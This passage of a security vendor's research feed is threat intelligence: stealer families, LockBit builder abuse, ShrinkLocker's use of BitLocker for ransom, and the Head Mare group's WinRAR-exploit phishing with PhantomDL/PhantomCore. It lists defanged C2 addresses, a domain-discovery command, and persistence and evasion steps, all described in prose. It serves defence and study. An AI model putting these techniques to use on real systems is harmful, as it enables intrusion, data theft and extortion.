  2759. <p><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30184648/it_threat_evolution_q2_2024_02.png" class="magnificImage"><img loading="lazy" decoding="async" class="aligncenter size-large wp-image-113673" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30184648/it_threat_evolution_q2_2024_02-1024x508.png" alt="" width="1024" height="508" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30184648/it_threat_evolution_q2_2024_02-1024x508.png 1024w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30184648/it_threat_evolution_q2_2024_02-300x149.png 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30184648/it_threat_evolution_q2_2024_02-768x381.png 768w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30184648/it_threat_evolution_q2_2024_02-706x350.png 706w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30184648/it_threat_evolution_q2_2024_02-740x367.png 740w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30184648/it_threat_evolution_q2_2024_02-565x280.png 565w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30184648/it_threat_evolution_q2_2024_02-800x397.png 800w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30184648/it_threat_evolution_q2_2024_02.png 1382w" sizes="(max-width: 1024px) 100vw, 1024px" /></a></p>
  2760. <p>The builder also allows attackers to choose exactly what they want to encrypt. If they know enough about the target&#8217;s infrastructure, they can create malware tailored to the specific configuration of the target&#8217;s network architecture, such as important files, administrative accounts and critical systems.</p>
  2761. <p>This has allowed attackers to generate customized versions of this threat to suit their needs, making their attacks more effective.</p>
  2762. <p>In February, the international law enforcement task force <a href="https://www.weforum.org/agenda/2024/02/lockbit-ransomware-operation-cronos-cybercrime/" target="_blank" rel="noopener">Operation Cronos</a> gained insight into LockBit&#8217;s operations after taking down the group. The operation involved law enforcement agencies from 10 countries. They were able to seize the group&#8217;s infrastructure, obtain private decryption keys and create a <a href="https://www.nomoreransom.org/es/decryption-tools.html#Lockbit30" target="_blank" rel="noopener">decryption toolset</a> based on a list of known victim IDs obtained by the authorities. However, just a few days later, the ransomware group <a href="https://www.scmagazine.com/news/lockbit-returns-after-takedown-with-new-extortion-threats" target="_blank" rel="noopener">announced</a> that it was back in action.</p>
  2763. <p>In a recent incident response engagement, we were faced with a ransomware attack that involved a ransomware sample created with the same leaked builder. The attackers were able to find the admin credentials in plain text. They created a custom version of the ransomware that used the account credentials to spread across the network and perform malicious activities, such as killing Windows Defender and deleting Windows Event Logs to encrypt data and cover its tracks. In <a href="https://securelist.com/lockbit-3-0-based-custom-targeted-ransomware/112375/" target="_blank" rel="noopener">one of our latest articles</a>, we revisited the LockBit 3.0 builder files and analyzed the steps the attackers took to compromise the network.</p>
  2764. <h3 id="stealers-stealers-and-more-stealers">Stealers, stealers and more stealers</h3>
  2765. <p>Stealers are a prominent feature of the threat landscape. They are designed to harvest passwords and other sensitive data from infected computers that can then be used in other attacks, resulting in financial loss to the target. Over the past year we have published a number of public and private reports on newly discovered stealers. We recently wrote <a href="https://securelist.com/crimeware-report-stealers/112633/" target="_blank" rel="noopener">reports on Acrid, ScarletStealer and Sys01</a>: the first two are new, the latter has been updated.</p>
  2766. <p>Acrid, a new stealer discovered in December 2023, is written in C++ for the 32-bit system, despite the fact that most systems are now 64-bit. Upon closer inspection, it became apparent that the authors had compiled it for a 32-bit environment in order to use the &#8220;Heaven&#8217;s Gate&#8221; technique, which allows 32-bit applications to access the 64-bit space to bypass certain security controls. This malware is designed to steal browser data, local cryptocurrency wallets, files with specific names (<em>wallet.dat</em>, <em>password.docx</em>, etc.) and credentials from installed applications (FTP managers, messengers, etc.). The collected data are zipped and sent to the C2.</p>
  2767. <p>Last January, we analyzed a downloader we dubbed &#8220;Penguish&#8221;. One of the payloads it downloaded was a previously unknown stealer called &#8220;ScarletStealer&#8221; – an odd stealer, since most of its functionality is contained in other binaries (applications and Chrome extensions) that it downloads. When ScarletStealer is executed, it checks for the presence of cryptocurrencies and crypto wallets by looking for certain folder paths (e.g., %APPDATA%\Roaming\Exodus). If anything is detected, it starts downloading the additional executables using PowerShell. Most ScarletStealer executables are digitally signed. This stealer is very underdeveloped in terms of functionality and contains many bugs, errors, and redundant code. Considering the effort it takes to install the malware through a long chain of downloaders, the last of which is Penguish, it&#8217;s strange that it&#8217;s not more advanced.</p>
  2768. <p>SYS01 (aka Album Stealer and S1deload Stealer), a relatively unknown malware that has been around since at least 2022, has evolved from a C# stealer to a PHP stealer. What hasn&#8217;t changed is the infection vector. Users are tricked into downloading a malicious ZIP archive disguised as an adult video via a Facebook page.</p>
  2769. <p><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30184821/it_threat_evolution_q2_2024_03.png" class="magnificImage"><img loading="lazy" decoding="async" class="aligncenter size-large wp-image-113674" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30184821/it_threat_evolution_q2_2024_03-1024x741.png" alt="" width="1024" height="741" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30184821/it_threat_evolution_q2_2024_03-1024x741.png 1024w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30184821/it_threat_evolution_q2_2024_03-300x217.png 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30184821/it_threat_evolution_q2_2024_03-768x556.png 768w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30184821/it_threat_evolution_q2_2024_03-484x350.png 484w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30184821/it_threat_evolution_q2_2024_03-740x535.png 740w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30184821/it_threat_evolution_q2_2024_03-387x280.png 387w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30184821/it_threat_evolution_q2_2024_03-800x579.png 800w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30184821/it_threat_evolution_q2_2024_03.png 1233w" sizes="(max-width: 1024px) 100vw, 1024px" /></a></p>
  2770. <p>The archive contains a legitimate binary that sideloads a malicious DLL. This DLL opens an adult video and executes the next payload, which is a malicious PHP file encoded with <a href="https://www.ioncube.com/php_encoder.php" target="_blank" rel="noopener">ionCube</a>. The executed PHP file calls a script, <em>install.bat</em>, which ultimately executes the next stage by running a PowerShell command. This layer is conveniently named &#8220;runalayer&#8221; and runs what appears to be the final payload called &#8220;Newb&#8221;. However, we found a difference between the latest version and the previous publicly disclosed versions of the stealer. The current stealer (Newb) includes functionality to steal Facebook-related data and send stolen browser data to the C2. It also contains backdoor functionality. However, we found that the code that actually collects the browser data sent by Newb is in a different sample named &#8220;imageclass&#8221;. It is not 100% clear how imageclass was pushed to the system; but looking at the backdoor code of Newb, we concluded with a high degree of certainty that imageclass was later pushed through Newb to the infected machine. The initial ZIP archive also contains another malicious PHP file, <em>include.php</em>: this has similar backdoor functionality to Newb and accepts many of the same commands in the same format.</p>
  2771. <h3 id="shrinklocker-turning-bitlocker-into-a-ransomware-utility">ShrinkLocker: turning BitLocker into a ransomware utility</h3>
  2772. <p>During a recent incident response engagement, we discovered ransomware called &#8220;ShrinkLocker&#8221; that uses BitLocker to encrypt compromised computers. BitLocker is the full-disk encryption utility built into Windows that is designed to prevent data exposure on lost or stolen computers.</p>
  2773. <p>ShrinkLocker is implemented as a sophisticated VBScript. If the script detects that it&#8217;s running on Windows 2000, XP, 2003 or Vista, it shuts down. However, for later versions of Windows, it runs the appropriate portion of its code for the specific operating system. ShrinkLocker shrinks the computer&#8217;s drive partitions by 100MB and uses this slack space to create a boot partition for itself. The malware modifies the registry to configure BitLocker to run with the attacker&#8217;s settings. It then disables and removes all default BitLocker protections to prevent key recovery and enables the numeric password protection option. The script then generates this password and initiates encryption of all local drives before sending the password and system information to the attacker&#8217;s C2 server. Finally, the malware deletes itself and reboots the system.</p>
  2774. <p>If the user tries to use the recovery option while the computer is booting, they will see a message stating that no BitLocker recovery options are available.</p>
  2775. <p><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30184959/it_threat_evolution_q2_2024_04.png" class="magnificImage"><img loading="lazy" decoding="async" class="aligncenter size-full wp-image-113675" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30184959/it_threat_evolution_q2_2024_04.png" alt="" width="884" height="645" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30184959/it_threat_evolution_q2_2024_04.png 884w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30184959/it_threat_evolution_q2_2024_04-300x219.png 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30184959/it_threat_evolution_q2_2024_04-768x560.png 768w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30184959/it_threat_evolution_q2_2024_04-480x350.png 480w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30184959/it_threat_evolution_q2_2024_04-740x540.png 740w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30184959/it_threat_evolution_q2_2024_04-384x280.png 384w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30184959/it_threat_evolution_q2_2024_04-800x584.png 800w" sizes="(max-width: 884px) 100vw, 884px" /></a></p>
  2776. <p>ShrinkLocker changes the labels of all system drives to the attacker&#8217;s email address instead of leaving a ransom note.</p>
  2777. <p><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30185540/it_threat_evolution_q2_2024_05.png" class="magnificImage"><img loading="lazy" decoding="async" class="aligncenter size-full wp-image-113676" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30185540/it_threat_evolution_q2_2024_05.png" alt="" width="780" height="123" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30185540/it_threat_evolution_q2_2024_05.png 780w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30185540/it_threat_evolution_q2_2024_05-300x47.png 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30185540/it_threat_evolution_q2_2024_05-768x121.png 768w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30185540/it_threat_evolution_q2_2024_05-740x117.png 740w" sizes="(max-width: 780px) 100vw, 780px" /></a></p>
  2778. <p>You can read our full analysis of ShrinkLocker <a href="https://securelist.com/ransomware-abuses-bitlocker/112643/" target="_blank" rel="noopener">here</a>.</p>
  2779. ]]></content:encoded>
  2780. <wfw:commentRss>https://securelist.com/it-threat-evolution-q2-2024/113669/feed/</wfw:commentRss>
  2781. <slash:comments>0</slash:comments>
  2782. <media:content xmlns:media="http://search.yahoo.com/mrss/" url="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/09/03071551/malware-report-q2-2024-featured.jpg" width="1376" height="864"><media:keywords>full</media:keywords></media:content>
  2783. <media:content xmlns:media="http://search.yahoo.com/mrss/" url="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/09/03071551/malware-report-q2-2024-featured-1024x643.jpg" width="1024" height="643"><media:keywords>large</media:keywords></media:content>
  2784. <media:content xmlns:media="http://search.yahoo.com/mrss/" url="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/09/03071551/malware-report-q2-2024-featured-300x188.jpg" width="300" height="188"><media:keywords>medium</media:keywords></media:content>
  2785. <media:content xmlns:media="http://search.yahoo.com/mrss/" url="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/09/03071551/malware-report-q2-2024-featured-150x150.jpg" width="150" height="150"><media:keywords>thumbnail</media:keywords></media:content>
  2786. </item>
  2787. <item>
  2788. <title>Head Mare: adventures of a unicorn in Russia and Belarus</title>
  2789. <link>https://securelist.com/head-mare-hacktivists/113555/</link>
  2790. <comments>https://securelist.com/head-mare-hacktivists/113555/#respond</comments>
  2791. <dc:creator><![CDATA[Kaspersky]]></dc:creator>
  2792. <pubDate>Mon, 02 Sep 2024 10:00:22 +0000</pubDate>
  2793. <category><![CDATA[Crimeware reports]]></category>
  2794. <category><![CDATA[Babuk]]></category>
  2795. <category><![CDATA[Backdoor]]></category>
  2796. <category><![CDATA[crimeware]]></category>
  2797. <category><![CDATA[Data Encryption]]></category>
  2798. <category><![CDATA[hacktivists]]></category>
  2799. <category><![CDATA[Head Mare]]></category>
  2800. <category><![CDATA[LockBit]]></category>
  2801. <category><![CDATA[PhantomDL]]></category>
  2802. <category><![CDATA[Ransomware]]></category>
  2803. <category><![CDATA[Targeted attacks]]></category>
  2804. <category><![CDATA[Trojan]]></category>
  2805. <category><![CDATA[TTPs]]></category>
  2806. <category><![CDATA[Windows malware]]></category>
  2807. <guid isPermaLink="false">https://kasperskycontenthub.com/securelist/?p=113555</guid>
  2808.  
  2809. <description><![CDATA[Analysis of the hacktivist group Head Mare targeting companies in Russia and Belarus: exploitation of WinRAR vulnerability, custom tools PhantomDL and PhantomCore.]]></description>
  2810. <content:encoded><![CDATA[<p><img width="990" height="400" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30143637/SL-HeadMare-featured-01-990x400.jpg" class="attachment-securelist-huge-promo size-securelist-huge-promo wp-post-image" alt="" decoding="async" loading="lazy" /></p><p>Head Mare is a hacktivist group that first made itself known in 2023 on the social network X (formerly Twitter)<a href="#_ftn1" name="_ftnref1"><sup>[1]</sup></a>. In their public posts, the attackers reveal information about some of their victims, including organization names, internal documents stolen during attacks, and screenshots of desktops and administrative consoles.</p>
  2811. <p>By analyzing incidents in Russian companies, we identified how Head Mare conducts its attacks, the tools it uses, and established the group&#8217;s connection with <a href="https://securelist.ru/phantomdl-darkwatchman-rat-targeted-attacks/109919/" target="_blank" rel="noopener">the PhantomDL malware (article in Russian)</a>.</p>
  2812. <h2 id="key-findings">Key findings</h2>
  2813. <ul>
  2814. <li>Head Mare exclusively targets companies in Russia and Belarus.</li>
  2815. <li>For initial access, the group conducts various phishing campaigns distributing RAR archives that exploit the CVE-2023-38831 vulnerability in WinRAR.</li>
  2816. <li>Some of the discovered tools overlap with previously investigated groups attacking Russian organizations.</li>
  2817. <li>The group encrypts victims&#8217; devices using two ransomware families: LockBit for Windows and Babuk for Linux (ESXi).</li>
  2818. </ul>
  2819. <h2 id="technical-details">Technical details</h2>
  2820. <h3 id="historical-context">Historical context</h3>
  2821. <p>Since the beginning of the Russo-Ukrainian conflict, we&#8217;ve seen the emergence of numerous hacktivist groups whose main goal is often not financial gain but causing as much damage as possible to companies on the opposing side of the conflict. Head Mare is one such group, exclusively targeting organizations located in Russia and Belarus. This is confirmed by open-source information and telemetry from the Kaspersky Security Network – a system for collecting anonymized threat data voluntarily provided by users of our solutions.</p>
  2822. <p>Hacktivist groups attacking Russian organizations in the context of the Russo-Ukrainian conflict use similar techniques and tools and, when analyzed using the Unified Kill Chain method, generally resemble one another. However, unlike other similar groups, Head Mare uses more up-to-date methods for obtaining initial access. For instance, the attackers took advantage of the relatively recent CVE-2023-38831 vulnerability in WinRAR, which allows the attacker to execute arbitrary code on the system via a specially prepared archive. This approach allows the group to deliver and disguise the malicious payload more effectively.</p>
  2823. <p>Like most hacktivist groups, Head Mare maintains a public account on the social network X, where they post information about some of their victims. Below is an example of one of their posts:</p>
  2824. <div id="attachment_113571" style="width: 939px" class="wp-caption aligncenter"><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/27141228/HeadMare-en-ru-es_06.png" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-113571" class="size-full wp-image-113571" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/27141228/HeadMare-en-ru-es_06.png" alt="Head Mare post on X" width="929" height="792" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/27141228/HeadMare-en-ru-es_06.png 929w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/27141228/HeadMare-en-ru-es_06-300x256.png 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/27141228/HeadMare-en-ru-es_06-768x655.png 768w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/27141228/HeadMare-en-ru-es_06-411x350.png 411w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/27141228/HeadMare-en-ru-es_06-740x631.png 740w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/27141228/HeadMare-en-ru-es_06-328x280.png 328w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/27141228/HeadMare-en-ru-es_06-800x682.png 800w" sizes="(max-width: 929px) 100vw, 929px" /></a><p id="caption-attachment-113571" class="wp-caption-text">Head Mare post on X</p></div>
  2825. <p>At the time of carrying out the study, the group has claimed nine victims from various industries:</p>
  2826. <ul>
  2827. <li>Government institutions;</li>
  2828. <li>Transportation;</li>
  2829. <li>Energy;</li>
  2830. <li>Manufacturing;</li>
  2831. <li>Entertainment.</li>
  2832. </ul>
  2833. <p>The ultimate goal of the attackers is likely to cause maximum damage to companies in Russia and Belarus. However, unlike some other hacktivist groups, Head Mare also demands a ransom for data decryption.</p>
  2834. <h3 id="head-mares-toolkit">Head Mare&#8217;s toolkit</h3>
  2835. <p>In their attacks, Head Mare mainly uses publicly available software, which is typical of most hacktivist groups targeting Russian companies in the context of the Russo-Ukrainian conflict. However, while some hacktivists have no proprietary developments in their toolkit at all, Head Mare uses their custom malware PhantomDL and PhantomCore in phishing emails for initial access and exploitation.</p>
  2836. <p>Below is a list of software discovered in Head Mare attacks:</p>
  2837. <ul>
  2838. <li>LockBit ransomware;</li>
  2839. <li>Babuk ransomware;</li>
  2840. <li>PhantomDL;</li>
  2841. <li>PhantomCore;</li>
  2842. <li>Sliver;</li>
  2843. <li>ngrok;</li>
  2844. <li>rsockstun;</li>
  2845. <li>XenAllPasswordPro;</li>
  2846. <li>Mimikatz.</li>
  2847. </ul>
  2848. <p>Most of these tools are available on the internet, be it LockBit samples generated using the publicly available builder leaked in 2022, or the Mimikatz utility, whose code is available on GitHub.</p>
  2849. <h3 id="initial-access">Initial access</h3>
  2850. <p>During our investigation of Head Mare&#8217;s activities, we discovered that this group is associated with <a href="https://securelist.ru/phantomdl-darkwatchman-rat-targeted-attacks/109919/" target="_blank" rel="noopener">targeted attacks</a> on Russian organizations using malicious PhantomDL and PhantomCore samples. The detected samples were distributed in various phishing campaigns in archives with decoy documents of the same name. The malicious archives exploit the <a href="https://nvd.nist.gov/vuln/detail/CVE-2023-38831" target="_blank" rel="noopener">CVE-2023-38831</a> vulnerability in WinRAR. If the user attempts to open the legitimate-seeming document, they trigger the execution of the malicious file. The same sample could be distributed in different archives with decoy documents on various topics.</p>
  2851. <div id="attachment_113572" style="width: 1034px" class="wp-caption aligncenter"><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/27141349/HeadMare-en-ru-es_03.png" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-113572" class="size-large wp-image-113572" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/27141349/HeadMare-en-ru-es_03-1024x128.png" alt="Verdicts with which our products detect PhantomDL samples: the malware is recognized, among other things, as an exploit for CVE-2023-38831." width="1024" height="128" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/27141349/HeadMare-en-ru-es_03-1024x128.png 1024w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/27141349/HeadMare-en-ru-es_03-300x38.png 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/27141349/HeadMare-en-ru-es_03-768x96.png 768w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/27141349/HeadMare-en-ru-es_03-1536x192.png 1536w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/27141349/HeadMare-en-ru-es_03-740x93.png 740w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/27141349/HeadMare-en-ru-es_03-1600x200.png 1600w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/27141349/HeadMare-en-ru-es_03-800x100.png 800w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/27141349/HeadMare-en-ru-es_03.png 1644w" sizes="(max-width: 1024px) 100vw, 1024px" /></a><p id="caption-attachment-113572" class="wp-caption-text">Verdicts with which our products detect PhantomDL samples: the malware is recognized, among other things, as an exploit for CVE-2023-38831</p></div>
  2852. <p>After execution, PhantomDL and PhantomCore establish communication with one of the attackers&#8217; command servers and attempt to identify the domain to which the infected host belongs. Below are the results of dynamic analysis of several samples in Kaspersky Sandbox (detonation graphs), reflecting the malware&#8217;s behavior immediately after launch.</p>
  2853. <div id="attachment_113573" style="width: 1034px" class="wp-caption aligncenter"><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/27141436/HeadMare-en-ru_10.png" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-113573" class="size-large wp-image-113573" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/27141436/HeadMare-en-ru_10-1024x359.png" alt="Detonation graph of a PhantomDL sample reflecting its behavior in Kaspersky Sandbox" width="1024" height="359" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/27141436/HeadMare-en-ru_10-1024x359.png 1024w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/27141436/HeadMare-en-ru_10-300x105.png 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/27141436/HeadMare-en-ru_10-768x270.png 768w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/27141436/HeadMare-en-ru_10-997x350.png 997w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/27141436/HeadMare-en-ru_10-740x260.png 740w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/27141436/HeadMare-en-ru_10-798x280.png 798w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/27141436/HeadMare-en-ru_10-800x281.png 800w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/27141436/HeadMare-en-ru_10.png 1382w" sizes="(max-width: 1024px) 100vw, 1024px" /></a><p id="caption-attachment-113573" class="wp-caption-text">Detonation graph of a PhantomDL sample reflecting its behavior in Kaspersky Sandbox</p></div>
  2854. <p>In the image above, the PhantomDL sample connects to the C2 server 91.219.151[.]47 through port 80 and performs domain identification using the command <pre class="crayon-plain-tag">cmd.exe /c "echo %USERDOMAIN%"</pre>.</p>
  2855. <div id="attachment_113574" style="width: 1034px" class="wp-caption aligncenter"><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/27141525/HeadMare-en-ru-es_01.png" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-113574" class="size-large wp-image-113574" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/27141525/HeadMare-en-ru-es_01-1024x196.png" alt="PhantomDL communication with C2" width="1024" height="196" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/27141525/HeadMare-en-ru-es_01-1024x196.png 1024w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/27141525/HeadMare-en-ru-es_01-300x57.png 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/27141525/HeadMare-en-ru-es_01-768x147.png 768w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/27141525/HeadMare-en-ru-es_01-740x141.png 740w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/27141525/HeadMare-en-ru-es_01-800x153.png 800w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/27141525/HeadMare-en-ru-es_01.png 1063w" sizes="(max-width: 1024px) 100vw, 1024px" /></a><p id="caption-attachment-113574" class="wp-caption-text">PhantomDL communication with C2</p></div>
  2856. <p>The PhantomCore sample establishes a connection with another C2 (45.11.27[.]232) and checks the host&#8217;s domain using the WinAPI function <pre class="crayon-plain-tag">NetGetJoinInformation</pre>.</p>
  2857. <div id="attachment_113575" style="width: 1004px" class="wp-caption aligncenter"><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/27141613/HeadMare-en-ru-es_11.png" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-113575" class="size-full wp-image-113575" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/27141613/HeadMare-en-ru-es_11.png" alt="PhantomCore sample detonation in Kaspersky Sandbox" width="994" height="512" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/27141613/HeadMare-en-ru-es_11.png 994w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/27141613/HeadMare-en-ru-es_11-300x155.png 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/27141613/HeadMare-en-ru-es_11-768x396.png 768w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/27141613/HeadMare-en-ru-es_11-679x350.png 679w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/27141613/HeadMare-en-ru-es_11-740x381.png 740w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/27141613/HeadMare-en-ru-es_11-544x280.png 544w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/27141613/HeadMare-en-ru-es_11-800x412.png 800w" sizes="(max-width: 994px) 100vw, 994px" /></a><p id="caption-attachment-113575" class="wp-caption-text">PhantomCore sample detonation in Kaspersky Sandbox</p></div>
  2858. <div id="attachment_113576" style="width: 1034px" class="wp-caption aligncenter"><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/27141717/HeadMare-en-ru-es_16.png" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-113576" class="size-large wp-image-113576" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/27141717/HeadMare-en-ru-es_16-1024x122.png" alt="Suspicious activity of the PhantomCore sample" width="1024" height="122" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/27141717/HeadMare-en-ru-es_16-1024x122.png 1024w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/27141717/HeadMare-en-ru-es_16-300x36.png 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/27141717/HeadMare-en-ru-es_16-768x92.png 768w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/27141717/HeadMare-en-ru-es_16-1536x183.png 1536w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/27141717/HeadMare-en-ru-es_16-740x88.png 740w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/27141717/HeadMare-en-ru-es_16-1600x191.png 1600w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/27141717/HeadMare-en-ru-es_16-800x95.png 800w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/27141717/HeadMare-en-ru-es_16.png 1626w" sizes="(max-width: 1024px) 100vw, 1024px" /></a><p id="caption-attachment-113576" class="wp-caption-text">Suspicious activity of the PhantomCore sample</p></div>
  2859. <p>Another PhantomCore sample, after execution, establishes a connection with C2 5.252.178[.]92:</p>
  2860. <div id="attachment_113577" style="width: 373px" class="wp-caption aligncenter"><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/27141749/HeadMare-en-ru-es_14.png" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-113577" class="size-full wp-image-113577" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/27141749/HeadMare-en-ru-es_14.png" alt="PhantomCore C2 connection" width="363" height="136" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/27141749/HeadMare-en-ru-es_14.png 363w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/27141749/HeadMare-en-ru-es_14-300x112.png 300w" sizes="(max-width: 363px) 100vw, 363px" /></a><p id="caption-attachment-113577" class="wp-caption-text">PhantomCore C2 connection</p></div>
  2861. <p>During our research, we also found several PhantomDL and PhantomCore samples, which we cannot attribute with complete certainty to the same cluster of activity as the samples found in Head Mare&#8217;s attacks. Information about these samples can be found in the section &#8220;Samples similar to Head Mare&#8217;s toolkit&#8221;.</p>
  2862. <h3 id="persistence-in-the-system">Persistence in the system</h3>
  2863. <p>The attackers used several methods to persist in the system. For example, in one incident, they added a PhantomCore sample to the Run registry key. After execution, the sample automatically established a connection with the attackers&#8217; C2 5.252.176[.]47:</p>
